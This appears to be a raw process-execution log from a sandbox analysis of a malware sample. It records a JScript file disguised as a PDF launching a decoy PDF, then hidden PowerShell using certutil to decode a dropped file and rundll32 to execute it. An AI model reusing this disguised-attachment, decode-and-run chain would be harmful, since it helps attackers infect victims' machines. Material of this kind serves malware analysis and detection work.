wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Result_2024-0617.pdf.jse
2628chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\ProgramData\Result_2024-0617.pdf"
2784chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef432f1e8,0x7fef432f1f8,0x7fef432f208
2828chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2788 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
2900powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\jgI47eo.oUIt C:\Windows\..\ProgramData\dB7Z32t.dFq6
2932certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\jgI47eo.oUIt C:\Windows\..\ProgramData\dB7Z32t.dFq6
812powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c rundll32.exe C:\Windows\..\ProgramData\dB7Z32t.dFq6 explore
2268